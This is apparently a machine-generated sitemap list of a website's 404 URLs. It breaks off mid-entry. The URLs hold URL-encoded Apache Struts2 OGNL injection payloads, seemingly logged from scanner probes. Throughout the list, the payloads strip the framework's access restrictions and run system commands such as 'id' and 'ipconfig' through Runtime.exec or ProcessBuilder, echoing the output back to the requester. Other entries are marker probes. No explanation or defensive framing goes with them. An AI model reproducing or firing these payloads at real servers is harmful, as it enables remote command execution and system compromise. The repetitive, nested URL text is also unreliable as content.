http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f=%3c721729+x%3d929979654%3e%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnr